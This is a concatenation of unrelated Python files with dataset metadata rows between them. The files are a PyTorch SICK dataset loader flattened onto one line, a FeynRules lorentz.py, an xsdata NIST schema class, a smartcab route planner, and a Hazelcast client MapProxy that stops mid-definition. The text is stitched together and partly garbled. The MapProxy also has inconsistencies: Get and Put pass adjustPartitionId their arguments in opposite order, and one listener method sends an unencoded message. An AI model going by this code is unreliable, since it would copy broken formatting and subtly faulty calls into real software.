import argparse import os import torch import torch.nn as nn import torch.utils.data as data class Configs(object): @staticmethod def base_config(): parser = argparse.ArgumentParser() parser.add_argument("--classifier", type=str, default="vdpwi", choices=["vdpwi", "resnet"]) parser.add_argument("--clip_norm", type=float, default=50) parser.add_argument("--cpu", action="store_true", default=False) parser.add_argument("--dataset", type=str, default="sick", choices=["sick"]) parser.add_argument("--decay", type=float, default=0.95) parser.add_argument("--input_file", type=str, default="local_saves/model.pt") parser.add_argument("--lr", type=float, default=5E-4) parser.add_argument("--mbatch_size", type=int, default=16) parser.add_argument("--mode", type=str, default="train", choices=["train", "test"]) parser.add_argument("--momentum", type=float, default=0.1) parser.add_argument("--n_epochs", type=int, default=35) parser.add_argument("--n_labels", type=int, default=5) parser.add_argument("--optimizer", type=str, default="rmsprop", choices=["adam", "sgd", "rmsprop"]) parser.add_argument("--output_file", type=str, default="local_saves/model.pt") parser.add_argument("--res_fmaps", type=int, default=32) parser.add_argument("--res_layers", type=int, default=16) parser.add_argument("--restore", action="store_true", default=False) parser.add_argument("--rnn_hidden_dim", type=int, default=250) parser.add_argument("--weight_decay", type=float, default=1E-5) parser.add_argument("--wordvecs_file", type=str, default="local_data/glove/glove.840B.300d.txt") return parser.parse_known_args()[0] @staticmethod def sick_config(): parser = argparse.ArgumentParser() parser.add_argument("--n_labels", type=int, default=5) parser.add_argument("--sick_cache", type=str, default="local_data/sick/.vec-cache") parser.add_argument("--sick_data", type=str, default="local_data/sick") return parser.parse_known_args()[0] class LabeledEmbeddedDataset(data.Dataset): def __init__(self, sentence_indices1, sentence_indices2, labels, compare_labels=None): assert len(sentence_indices1) == len(labels) == len(sentence_indices2) self.sentence_indices1 = sentence_indices1 self.sentence_indices2 = sentence_indices2 self.labels = labels self.compare_labels = compare_labels def __getitem__(self, idx): cmp_lbl = None if self.compare_labels is None else self.compare_labels[idx] return self.sentence_indices1[idx], self.sentence_indices2[idx], self.labels[idx], cmp_lbl def __len__(self): return len(self.labels) def load_sick(): config = Configs.sick_config() def fetch_indices(name): sentence_indices = [] filename = os.path.join(config.sick_data, dataset, name) with open(filename) as f: for line in f: indices = [embed_ids.get(word, -1) for word in line.strip().split()] indices = list(filter(lambda x: x >= 0, indices)) sentence_indices.append(indices) return sentence_indices def read_labels(filename): labels = [] with open(filename) as f: for line in f: labels.append([float(val) for val in line.split()]) return labels sets = [] embeddings = [] embed_ids = {} with open(os.path.join(config.sick_cache)) as f: for i, line in enumerate(f): word, vec = line.split(" ", 1) vec = list(map(float, vec.strip().split())) embed_ids[word] = i embeddings.append(vec) padding_idx = len(embeddings) embeddings.append([0.0] * 300) for dataset in ("train", "dev", "test"): sparse_filename = os.path.join(config.sick_data, dataset, "sim_sparse.txt") truth_filename = os.path.join(config.sick_data, dataset, "sim.txt") sparse_labels = read_labels(sparse_filename) cmp_labels = read_labels(truth_filename) indices1 = fetch_indices("a.toks") indices2 = fetch_indices("b.toks") sets.append(LabeledEmbeddedDataset(indices1, indices2, sparse_labels, cmp_labels)) embedding = nn.Embedding(len(embeddings), 300) embedding.weight.data.copy_(torch.Tensor(embeddings)) embedding.weight.requires_grad = False return embedding, sets def load_dataset(dataset): return _loaders[dataset]() _loaders = dict(sick=load_sick)
42.072727
107
0.658168
0c800b9a9b1539f81cc9f466ab49348cd7f2d73b
2,989
py
Python
mathematica/feynrules/KineticMixingDM_UFO/lorentz.py
LoganAMorrison/AsymptoticBoltzmann
ef0213a7acc3f8d7095b446716bc90bbb036493d
[ "MIT" ]
null
null
null
mathematica/feynrules/KineticMixingDM_UFO/lorentz.py
LoganAMorrison/AsymptoticBoltzmann
ef0213a7acc3f8d7095b446716bc90bbb036493d
[ "MIT" ]
null
null
null
mathematica/feynrules/KineticMixingDM_UFO/lorentz.py
LoganAMorrison/AsymptoticBoltzmann
ef0213a7acc3f8d7095b446716bc90bbb036493d
[ "MIT" ]
null
null
null
# This file was automatically created by FeynRules 2.3.36 # Mathematica version: 12.1.1 for Linux x86 (64-bit) (June 19, 2020) # Date: Thu 13 Aug 2020 15:13:29 from object_library import all_lorentz, Lorentz from function_library import complexconjugate, re, im, csc, sec, acsc, asec, cot try: import form_factors as ForFac except ImportError: pass UUS1 = Lorentz(name = 'UUS1', spins = [ -1, -1, 1 ], structure = '1') UUV1 = Lorentz(name = 'UUV1', spins = [ -1, -1, 3 ], structure = 'P(3,2) + P(3,3)') SSS1 = Lorentz(name = 'SSS1', spins = [ 1, 1, 1 ], structure = '1') FFS1 = Lorentz(name = 'FFS1', spins = [ 2, 2, 1 ], structure = 'ProjM(2,1)') FFS2 = Lorentz(name = 'FFS2', spins = [ 2, 2, 1 ], structure = 'ProjM(2,1) - ProjP(2,1)') FFS3 = Lorentz(name = 'FFS3', spins = [ 2, 2, 1 ], structure = 'ProjP(2,1)') FFS4 = Lorentz(name = 'FFS4', spins = [ 2, 2, 1 ], structure = 'ProjM(2,1) + ProjP(2,1)') FFV1 = Lorentz(name = 'FFV1', spins = [ 2, 2, 3 ], structure = 'Gamma(3,2,1)') FFV2 = Lorentz(name = 'FFV2', spins = [ 2, 2, 3 ], structure = 'Gamma(3,2,-1)*ProjM(-1,1)') FFV3 = Lorentz(name = 'FFV3', spins = [ 2, 2, 3 ], structure = 'Gamma(3,2,-1)*ProjP(-1,1)') VSS1 = Lorentz(name = 'VSS1', spins = [ 3, 1, 1 ], structure = 'P(1,2) - P(1,3)') VVS1 = Lorentz(name = 'VVS1', spins = [ 3, 3, 1 ], structure = 'Metric(1,2)') VVV1 = Lorentz(name = 'VVV1', spins = [ 3, 3, 3 ], structure = 'P(3,1)*Metric(1,2) - P(3,2)*Metric(1,2) - P(2,1)*Metric(1,3) + P(2,3)*Metric(1,3) + P(1,2)*Metric(2,3) - P(1,3)*Metric(2,3)') SSSS1 = Lorentz(name = 'SSSS1', spins = [ 1, 1, 1, 1 ], structure = '1') VVSS1 = Lorentz(name = 'VVSS1', spins = [ 3, 3, 1, 1 ], structure = 'Metric(1,2)') VVVV1 = Lorentz(name = 'VVVV1', spins = [ 3, 3, 3, 3 ], structure = 'Metric(1,4)*Metric(2,3) - Metric(1,3)*Metric(2,4)') VVVV2 = Lorentz(name = 'VVVV2', spins = [ 3, 3, 3, 3 ], structure = 'Metric(1,4)*Metric(2,3) + Metric(1,3)*Metric(2,4) - 2*Metric(1,2)*Metric(3,4)') VVVV3 = Lorentz(name = 'VVVV3', spins = [ 3, 3, 3, 3 ], structure = 'Metric(1,4)*Metric(2,3) - Metric(1,2)*Metric(3,4)') VVVV4 = Lorentz(name = 'VVVV4', spins = [ 3, 3, 3, 3 ], structure = 'Metric(1,3)*Metric(2,4) - Metric(1,2)*Metric(3,4)') VVVV5 = Lorentz(name = 'VVVV5', spins = [ 3, 3, 3, 3 ], structure = 'Metric(1,4)*Metric(2,3) - (Metric(1,3)*Metric(2,4))/2. - (Metric(1,2)*Metric(3,4))/2.')
31.463158
153
0.463031
ef2d9ce79e6bc0c87b840a6ce8204bae1ce5e0ef
430
py
Python
output/models/nist_data/atomic/ncname/schema_instance/nistschema_sv_iv_atomic_ncname_length_1_xsd/nistschema_sv_iv_atomic_ncname_length_1.py
tefra/xsdata-w3c-tests
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
[ "MIT" ]
1
2021-08-14T17:59:21.000Z
2021-08-14T17:59:21.000Z
output/models/nist_data/atomic/ncname/schema_instance/nistschema_sv_iv_atomic_ncname_length_1_xsd/nistschema_sv_iv_atomic_ncname_length_1.py
tefra/xsdata-w3c-tests
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
[ "MIT" ]
4
2020-02-12T21:30:44.000Z
2020-04-15T20:06:46.000Z
output/models/nist_data/atomic/ncname/schema_instance/nistschema_sv_iv_atomic_ncname_length_1_xsd/nistschema_sv_iv_atomic_ncname_length_1.py
tefra/xsdata-w3c-tests
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
[ "MIT" ]
null
null
null
from dataclasses import dataclass, field __NAMESPACE__ = "NISTSchema-SV-IV-atomic-NCName-length-1-NS" @dataclass class NistschemaSvIvAtomicNcnameLength1: class Meta: name = "NISTSchema-SV-IV-atomic-NCName-length-1" namespace = "NISTSchema-SV-IV-atomic-NCName-length-1-NS" value: str = field( default="", metadata={ "required": True, "length": 1, } )
22.631579
64
0.62093
5a52130a3fd85039c173d92ef0c13a0868635d7f
1,593
py
Python
smartcab/planner.py
thantuongaotrang/smart-cab
f5e34b15d01f6f15385318e5d09360cb1218b806
[ "MIT" ]
null
null
null
smartcab/planner.py
thantuongaotrang/smart-cab
f5e34b15d01f6f15385318e5d09360cb1218b806
[ "MIT" ]
null
null
null
smartcab/planner.py
thantuongaotrang/smart-cab
f5e34b15d01f6f15385318e5d09360cb1218b806
[ "MIT" ]
null
null
null
import random class RoutePlanner(object): """Silly route planner that is meant for a perpendicular grid network.""" def __init__(self, env, agent): self.env = env self.agent = agent self.destination = None def route_to(self, destination=None): self.destination = destination if destination is not None else random.choice(self.env.intersections.keys()) print "RoutePlanner.route_to(): destination = {}".format(destination) # [debug] def next_waypoint(self): location = self.env.agent_states[self.agent]['location'] heading = self.env.agent_states[self.agent]['heading'] delta = (self.destination[0] - location[0], self.destination[1] - location[1]) if delta[0] == 0 and delta[1] == 0: return None elif delta[0] != 0: # EW difference if delta[0] * heading[0] > 0: # facing correct EW direction return 'forward' elif delta[0] * heading[0] < 0: # facing opposite EW direction return 'right' # long U-turn elif delta[0] * heading[1] > 0: return 'right' else: return 'left' elif delta[1] != 0: # NS difference if delta[1] * heading[1] > 0: # facing correct NS direction return 'forward' elif delta[1] * heading[1] < 0: # facing opposite NS direction return 'right' # long U-turn elif delta[1] * heading[0] > 0: return 'right' else: return 'left'
40.846154
115
0.560578
3b9e5ed5d79c9462856e4e8a132ac963622f9889
33,643
py
Python
hzclient/proxy/mapproxy.py
hazelcast-incubator/hazelcast-python-client
5ec6c908916a6adef648059314923c0dbf71557b
[ "Apache-2.0" ]
null
null
null
hzclient/proxy/mapproxy.py
hazelcast-incubator/hazelcast-python-client
5ec6c908916a6adef648059314923c0dbf71557b
[ "Apache-2.0" ]
null
null
null
hzclient/proxy/mapproxy.py
hazelcast-incubator/hazelcast-python-client
5ec6c908916a6adef648059314923c0dbf71557b
[ "Apache-2.0" ]
null
null
null
__author__ = 'jonathanbrodie' from hzclient.codec import mapcodec from hzclient.codec import proxycodec from hzclient.clientmessage import ClientMessage from util import encode class MapProxy(object): def __init__(self,title,connfamily): self.title=title self.connection=connfamily firstpack=proxycodec.createProxy(self.title, "hz:impl:mapService") self.connection.sendPackage(firstpack) response=self.connection.getPackageWithCorrelationId(firstpack.correlation,True) newresponse=ClientMessage.decodeMessage(response) if response is not None: print "Initialized and connected proxy!" else: print "Unable to connect to server." def AddEntryListener(self, includeValue, eventhandler): msg=mapcodec.MapAddEntryListenerCodec.encodeRequest( encode.encodestring(self.title), encode.encodeboolean(includeValue)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) self.connection.eventregistry[correlationid]=mapcodec.MapAddEntryListenerCodec.EventHandler(eventhandler) return mapcodec.MapAddEntryListenerCodec.decodeResponse(msg2).response def AddEntryListenerToKey(self, key, includeValue, eventhandler): msg=mapcodec.MapAddEntryListenerToKeyCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeboolean(includeValue)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) self.connection.eventregistry[correlationid]=mapcodec.MapAddEntryListenerToKeyCodec.EventHandler(eventhandler) return mapcodec.MapAddEntryListenerToKeyCodec.decodeResponse(msg2).response def AddEntryListenerToKeyWithPredicate(self, key, predicate, includeValue, eventhandler): msg=mapcodec.MapAddEntryListenerToKeyWithPredicateCodec.encodeRequest( encode.encodestring(self.title), key, predicate, encode.encodeboolean(includeValue)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) self.connection.eventregistry[correlationid]=mapcodec.MapAddEntryListenerToKeyWithPredicateCodec.EventHandler(eventhandler) return mapcodec.MapAddEntryListenerToKeyWithPredicateCodec.decodeResponse(msg2).response def AddEntryListenerWithPredicate(self, predicate, includeValue, eventhandler): msg=mapcodec.MapAddEntryListenerWithPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate, encode.encodeboolean(includeValue)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) self.connection.eventregistry[correlationid]=mapcodec.MapAddEntryListenerWithPredicateCodec.EventHandler(eventhandler) return mapcodec.MapAddEntryListenerWithPredicateCodec.decodeResponse(msg2).response def AddIndex(self, attribute, ordered): msg=mapcodec.MapAddIndexCodec.encodeRequest( encode.encodestring(self.title), encode.encodestring(attribute), encode.encodeboolean(ordered)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapAddIndexCodec.decodeResponse(msg2) def AddInterceptor(self, interceptor): msg=mapcodec.MapAddInterceptorCodec.encodeRequest( encode.encodestring(self.title), interceptor) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapAddInterceptorCodec.decodeResponse(msg2).response def AddNearCacheEntryListener(self, includeValue, eventhandler): msg=mapcodec.MapAddNearCacheEntryListenerCodec.encodeRequest( encode.encodestring(self.title), encode.encodeboolean(includeValue)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) self.connection.eventregistry[correlationid]=mapcodec.MapAddNearCacheEntryListenerCodec.EventHandler(eventhandler) return mapcodec.MapAddNearCacheEntryListenerCodec.decodeResponse(msg2).response def AddPartitionLostListener(self, eventhandler): msg=mapcodec.MapAddPartitionLostListenerCodec.encodeRequest( encode.encodestring(self.title)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) self.connection.eventregistry[correlationid]=mapcodec.MapAddPartitionLostListenerCodec.EventHandler(eventhandler) return mapcodec.MapAddPartitionLostListenerCodec.decodeResponse(msg2).response def Clear(self, ): msg=mapcodec.MapClearCodec.encodeRequest( encode.encodestring(self.title)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapClearCodec.decodeResponse(msg2) def ContainsKey(self, key, threadId): msg=mapcodec.MapContainsKeyCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapContainsKeyCodec.decodeResponse(msg2).response def ContainsValue(self, value): msg=mapcodec.MapContainsValueCodec.encodeRequest( encode.encodestring(self.title), value) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapContainsValueCodec.decodeResponse(msg2).response def Delete(self, key, threadId): msg=mapcodec.MapDeleteCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapDeleteCodec.decodeResponse(msg2) def EntriesWithPagingPredicate(self, predicate): msg=mapcodec.MapEntriesWithPagingPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapEntriesWithPagingPredicateCodec.decodeResponse(msg2).entrySet def EntriesWithPredicate(self, predicate): msg=mapcodec.MapEntriesWithPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapEntriesWithPredicateCodec.decodeResponse(msg2).entrySet def EntrySet(self, ): msg=mapcodec.MapEntrySetCodec.encodeRequest( encode.encodestring(self.title)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapEntrySetCodec.decodeResponse(msg2).entrySet def EvictAll(self, ): msg=mapcodec.MapEvictAllCodec.encodeRequest( encode.encodestring(self.title)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapEvictAllCodec.decodeResponse(msg2) def Evict(self, key, threadId): msg=mapcodec.MapEvictCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapEvictCodec.decodeResponse(msg2).response def ExecuteOnAllKeys(self, entryProcessor): msg=mapcodec.MapExecuteOnAllKeysCodec.encodeRequest( encode.encodestring(self.title), entryProcessor) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapExecuteOnAllKeysCodec.decodeResponse(msg2).entrySet def ExecuteOnKey(self, entryProcessor, key): msg=mapcodec.MapExecuteOnKeyCodec.encodeRequest( encode.encodestring(self.title), entryProcessor, key) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapExecuteOnKeyCodec.decodeResponse(msg2).response def ExecuteOnKeys(self, entryProcessor, keys): msg=mapcodec.MapExecuteOnKeysCodec.encodeRequest( encode.encodestring(self.title), entryProcessor, keys) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapExecuteOnKeysCodec.decodeResponse(msg2).entrySet def ExecuteWithPredicate(self, entryProcessor, predicate): msg=mapcodec.MapExecuteWithPredicateCodec.encodeRequest( encode.encodestring(self.title), entryProcessor, predicate) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapExecuteWithPredicateCodec.decodeResponse(msg2).entrySet def Flush(self, ): msg=mapcodec.MapFlushCodec.encodeRequest( encode.encodestring(self.title)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapFlushCodec.decodeResponse(msg2) def ForceUnlock(self, key): msg=mapcodec.MapForceUnlockCodec.encodeRequest( encode.encodestring(self.title), key) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapForceUnlockCodec.decodeResponse(msg2) def GetAll(self, keys): msg=mapcodec.MapGetAllCodec.encodeRequest( encode.encodestring(self.title), keys) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapGetAllCodec.decodeResponse(msg2).entrySet def GetAsync(self, key, threadId): msg=mapcodec.MapGetAsyncCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapGetAsyncCodec.decodeResponse(msg2).response def Get(self, key, threadId): msg=mapcodec.MapGetCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) self.connection.adjustPartitionId(key,msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapGetCodec.decodeResponse(msg2).response def GetEntryView(self, key, threadId): msg=mapcodec.MapGetEntryViewCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapGetEntryViewCodec.decodeResponse(msg2).dataEntryView def IsEmpty(self, ): msg=mapcodec.MapIsEmptyCodec.encodeRequest( encode.encodestring(self.title)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapIsEmptyCodec.decodeResponse(msg2).response def IsLocked(self, key): msg=mapcodec.MapIsLockedCodec.encodeRequest( encode.encodestring(self.title), key) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapIsLockedCodec.decodeResponse(msg2).response def KeySet(self): msg=mapcodec.MapKeySetCodec.encodeRequest(encode.encodestring(self.title)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapKeySetCodec.decodeResponse(msg2).set def KeySetWithPagingPredicate(self, predicate): msg=mapcodec.MapKeySetWithPagingPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapKeySetWithPagingPredicateCodec.decodeResponse(msg2).set def KeySetWithPredicate(self, predicate): msg=mapcodec.MapKeySetWithPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapKeySetWithPredicateCodec.decodeResponse(msg2).set def LoadAll(self, replaceExistingValues): msg=mapcodec.MapLoadAllCodec.encodeRequest( encode.encodestring(self.title), encode.encodeboolean(replaceExistingValues)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapLoadAllCodec.decodeResponse(msg2) def LoadGivenKeys(self, keys, replaceExistingValues): msg=mapcodec.MapLoadGivenKeysCodec.encodeRequest( encode.encodestring(self.title), keys, encode.encodeboolean(replaceExistingValues)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapLoadGivenKeysCodec.decodeResponse(msg2) def Lock(self, key, threadId, ttl): msg=mapcodec.MapLockCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId), encode.encodeint64(ttl)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapLockCodec.decodeResponse(msg2) def PutAll(self, entries): msg=mapcodec.MapPutAllCodec.encodeRequest( encode.encodestring(self.title), entries) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapPutAllCodec.decodeResponse(msg2) def PutAsync(self, key, value, threadId, ttl): msg=mapcodec.MapPutAsyncCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId), encode.encodeint64(ttl)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapPutAsyncCodec.decodeResponse(msg2).response def Put(self, key, value, threadId, ttl): msg=mapcodec.MapPutCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId), encode.encodeint64(ttl)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) self.connection.adjustPartitionId(msg,key) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapPutCodec.decodeResponse(msg2).response def PutIfAbsent(self, key, value, threadId, ttl): msg=mapcodec.MapPutIfAbsentCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId), encode.encodeint64(ttl)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapPutIfAbsentCodec.decodeResponse(msg2).response def PutTransient(self, key, value, threadId, ttl): msg=mapcodec.MapPutTransientCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId), encode.encodeint64(ttl)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapPutTransientCodec.decodeResponse(msg2) def RemoveAsync(self, key, threadId): msg=mapcodec.MapRemoveAsyncCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapRemoveAsyncCodec.decodeResponse(msg2).response def Remove(self, key, threadId): msg=mapcodec.MapRemoveCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapRemoveCodec.decodeResponse(msg2).response def RemoveEntryListener(self, registrationId): msg=mapcodec.MapRemoveEntryListenerCodec.encodeRequest( encode.encodestring(self.title), encode.encodestring(registrationId)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapRemoveEntryListenerCodec.decodeResponse(msg2).response def 